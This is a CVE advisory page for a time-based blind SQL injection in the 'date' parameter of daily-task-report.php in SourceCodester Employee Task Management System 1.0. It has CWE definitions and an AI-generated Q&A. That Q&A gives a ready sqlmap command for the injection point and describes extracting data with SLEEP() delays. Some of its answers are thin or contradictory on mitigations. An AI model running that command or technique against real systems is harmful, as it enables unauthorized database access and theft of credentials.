CVE-2026-3752

Received Received - Intake

SQL Injection in SourceCodester Employee Task Management System

Publication date: 2026-03-08

Last updated on: 2026-04-29

Assigner: VulDB

Description

A flaw has been found in SourceCodester Employee Task Management System up to 1.0. The affected element is an unknown function of the file /daily-task-report.php of the component GET Parameter Handler. This manipulation of the argument Date causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published

2026-03-08

Last Modified

2026-04-29

Generated

2026-05-07

AI Q&A

2026-03-08

EPSS Evaluated

2026-05-05

NVD

CVE-2026-3752

EUVD

EUVD-2026-10255

Affected Vendors & Products

Vendor	Product	Version / Range
oretnom23	employee_task_management_system	1.0

Helpful Resources

Exploitability

CWE

KEV

CWE ID	Description
CWE-74	The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
CWE-89	The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

CWE ID

Description

CWE-74

The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.

CWE-89

The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Attack-Flow Graph

AI Powered Q&A

How can this vulnerability impact me? :

This vulnerability can lead to unauthorized data exfiltration, including sensitive information such as employee records and administrator credentials.

Attackers can enumerate the database schema and extract confidential data by exploiting the time-based blind SQL injection flaw.

The flaw impacts the confidentiality, integrity, and availability of the system, potentially allowing attackers to compromise the system remotely after authentication.

How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

I don't know

Can you explain this vulnerability to me?

[{'type': 'paragraph', 'content': 'CVE-2026-3752 is a SQL injection vulnerability found in SourceCodester Employee Task Management System version 1.0, specifically in the file daily-task-report.php. The flaw exists in the handling of the GET parameter "date", which is not properly sanitized before being used in a SQL query.'}, {'type': 'paragraph', 'content': 'An authenticated attacker can exploit this vulnerability by manipulating the "date" parameter to perform a time-based blind SQL injection attack. This technique uses SQL commands like SLEEP() to infer database information based on response delays, allowing the attacker to extract sensitive data from the backend database without direct output.'}] [1, 2, 3]

How can this vulnerability be detected on my network or system? Can you suggest some commands?

[{'type': 'paragraph', 'content': 'This vulnerability can be detected by testing the GET parameter "date" in the /daily-task-report.php file for time-based blind SQL injection. An authenticated attacker can exploit this by injecting SQL commands that cause time delays, such as the MySQL SLEEP() function, to infer database information based on response times.'}, {'type': 'paragraph', 'content': 'A practical detection method is to use sqlmap with a command similar to the following to confirm the injection point:'}, {'type': 'list_item', 'content': 'sqlmap -u "http://127.0.0.1:8085/daily-task-report.php?date=60120-02-02" --batch -v 6 --risk=3 --cookie "PHPSESSID=YOUR_COOKIE_HERE"'}, {'type': 'paragraph', 'content': 'This command tests the "date" parameter for SQL injection by sending crafted requests and analyzing response delays to detect the vulnerability.'}] [2]

What immediate steps should I take to mitigate this vulnerability?

[{'type': 'paragraph', 'content': 'No known mitigations or countermeasures have been documented for this vulnerability.'}, {'type': 'paragraph', 'content': 'It is suggested to replace the affected product with an alternative that does not contain this vulnerability.'}, {'type': 'paragraph', 'content': 'Since the vulnerability requires authentication and exploits improper sanitization of the "date" GET parameter, immediate steps include restricting access to authenticated users, monitoring for suspicious activity, and applying any available patches or updates from the vendor if released.'}] [3]

Ask Our AI Assistant

Need more information? Ask your question to get an AI reply (Powered by our expertise)

0/70

CVE-2026-3752

SQL Injection in SourceCodester Employee Task Management System

Description

CVSS Scores

EPSS Scores

Meta Information

Affected Vendors & Products

Helpful Resources

Exploitability

Attack-Flow Graph

AI Powered Q&A

Ask Our AI Assistant

EPSS Chart